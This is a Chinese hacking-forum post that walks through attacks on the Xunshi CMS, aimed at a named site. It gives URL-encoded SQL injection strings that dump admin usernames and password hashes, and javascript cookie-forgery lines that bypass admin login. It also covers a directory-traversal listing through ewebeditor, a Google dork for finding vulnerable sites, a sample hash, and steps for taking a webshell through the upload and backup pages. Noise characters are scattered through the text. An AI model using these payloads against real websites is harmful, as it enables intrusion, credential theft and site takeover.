找回密码
 立即注册
查看: 2921|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
4 W0 U- W) b. C9 @+ P2 R8 r0 P. B6 H: y5 E0 ?% Z
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
* l; Z9 Y# ?# K- B: g& k  c/ i: H2 K$ Q
以下本文总结来自黑防去年第9期杂志上的内容...
6 w* u" V6 w5 ^
) ?1 k$ ^8 h! Q( A7 r. _先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
& m' \% a+ F6 S9 o8 H
* i8 a- `) J1 D6 r3 X# \  [26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 6 t: V$ c2 R# o) z5 ~! ]( D& K

. T# T4 G" A! E) L0 M+ ?* o. r" _记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况: _+ p: c" W1 f$ p/ F
这里一个注入3 w6 T. Y6 @' q
! V3 l: k2 b; i/ v6 \1 S; t, \
效果如图:8 m8 }' o, |( ]* V% r4 D

1 v7 s$ t8 Q' @1 A& t& k  L # b3 |! Z/ M5 i5 G% r
& A! P) I# [4 G+ x
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.% B2 \; m/ G1 Y0 z8 y1 F
3 z: B, Q: L& }7 H
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
3 a9 [2 r8 R6 h6 R9 O+ v6 ~, U9 u9 k& f
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
: A" U9 K1 P# B. a! z  c; L1 M& L0 e0 {- U
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:$ j  Y. a3 D8 [) C1 O

: ^" K* t8 S  k. R' x0 S因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞" P) {* i- |9 |+ o; u3 T5 g2 Z
% r. U% T6 j; c+ }/ O
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
& P5 o% \1 @( g5 |9 X# C# _/ g+ V8 [
访问这页面来列目录..步骤如下:$ |2 ^  H4 v" M! ?$ @& n) o

! }( S, t2 W& {# G% d" b, Q; Ujavascript:alert(document.cookie="admindj=1") 6 T9 g, `( x  b' f  H2 E

7 |% _0 J& a# W3 fhttp://www.political-security.co ... asp?id=46&dir=../..
$ U9 b: e+ ~  P- o. E3 S" m( n
% H4 _* B2 }8 |1 R2 F' r, e效果如图:
1 |! A! E4 A( o
! y' N: E+ ]. F0 m1 z: N 6 N: p% V7 E/ k* {5 P0 k3 V' K) }

* e( Z- ]: t2 }$ c4 G6 D这样全站目录都能瞧了..找到后台目录..进去..
: e& B1 ^5 l, D( I, ~" T! }, x7 r! x
& S6 _; B+ g; C5 ^; l1 k! e, c那么进了后台怎么拿shell??上传--备份就ok了..3 m7 q( G' p6 Q% R9 \. R. j9 z
# n. W% Y  I/ k5 l8 l
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
2 o0 t1 P, u5 K& Z0 \  p' l$ @& R" _( v
这个我也碰到过一次..你都可以通过列目录来实现..
2 y. Z# s# h! ?( V2 X/ F  G+ A6 x# q7 P" }: e& w/ a
javascript:alert(document.cookie="admindj=1")
0 L& X- c" b  I! i. u+ e7 f, w$ m8 a. z! _0 ]) G
http://www.political-security.co ... p?action=BackupData $ o6 J5 B% h6 g' c3 u) J7 L0 p

! r2 Y$ N$ b, R/ l/ t9 C# Q备份ok..0 G$ E( s/ D8 g4 S
1 }& U" n. m; ?$ U  M4 F
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
8 ]- V4 \. o% ]6 n; s. }% |, t9 z- w$ p
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下% {: M; ]9 {, ?& [
# }/ f0 r5 ]% F
然后访问此页面进行注入..步骤如下:
2 z* L( b: ~4 n$ U7 N
% Q/ d7 U. {% T7 \javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
4 c6 T2 S- J9 E8 I) k5 G5 {$ D3 i+ Y/ S0 n
然后请求admin/admin_chk.asp页面
* I/ h& [2 g% L1 R1 W4 t7 r6 P+ \8 O0 p" e3 G( }9 `0 T( A
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%; C! e* ~0 v- E& I4 [

$ ?, g) S. |/ w% N26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin, p5 X! M# s! w. V) m! I1 x5 v. Z
/ J9 x4 \" ^: y$ L9 n, p
效果如图所示:3 O# J% F4 Q% E, O% m3 b

! Y5 a& B2 k: ^9 o8 p* c$ x " X8 k: ^0 n* Z4 I+ P  f

/ J1 ?* E/ u# `讯时漏洞2
( O* K- u2 v4 Q( a8 v1 d1 Agoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
- I1 d3 Z$ s* n$ @& P  S5 o( l6 A( m - I6 L1 W- f" a# F0 P3 }# @* `
1、/admin/admin_news_pl_view.asp?id=1
5 P" p& a0 L. r) V8 |//id任意 填入以下语句) w2 D; n; c2 C3 z0 r0 V9 ?+ `

9 P/ u+ e% c! K5 I* g' k" j( U2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
6 p8 ]5 z* i/ D
- y: V+ `% Q  Q5 Z5 z. W( L+ k2 \. K, a

& {1 p8 A9 s; A: j" R7 |3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='8 p7 l8 X! k1 K* O* G" s( l

8 H4 \2 k: v9 h, q$ ?8 V, e5 W+ A% h" `

: O, n& f8 z# r2 ?" i- ?8 c爆出管理员帐号和密码了
/ F% d8 @2 i& j! O " t4 q0 }8 u* y6 }
3 \4 g/ |# T5 ]$ W- V: D
- j& Z$ o4 `9 {' l2 N( v$ G9 ~6 W  G
4、cookies进后台( p- E% d& _* y! b9 h$ W+ y7 _

7 _5 C! l4 d8 h" Ijavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));4 g  z" D; c  N' c' D; g

; x0 v& C0 J# w
* R- u7 G* m: A! U3 I. o
! N/ D; c$ {3 J) K& W% P+ Z% }+ U5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!5 l# |& b+ M6 X

! |, S. ?6 D* n$ l( M( }* T* G; h
5 E+ o) B& y3 I' A8 a
6 f5 k) P; M7 s1 z% V& v9 X' t1 Q* P6、后台有上传和备份取SHELL不难。- L% F* G! z8 V4 p; ]

, f" h! ^: r9 z" R4 q7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..1 U  a. j# Q2 h1 t/ t0 _' E

& c+ |8 E8 Y1 f  C3 O1 c' D2 o逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!6 M& J; G3 @1 W  W1 k9 @

2 c+ R/ H9 ^2 l& g$ ~( R% [& D
+ k- I) S0 V$ Y1 h+ ?( i1 w8 @  x1 \
9 [; r' ~7 Y' |% [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表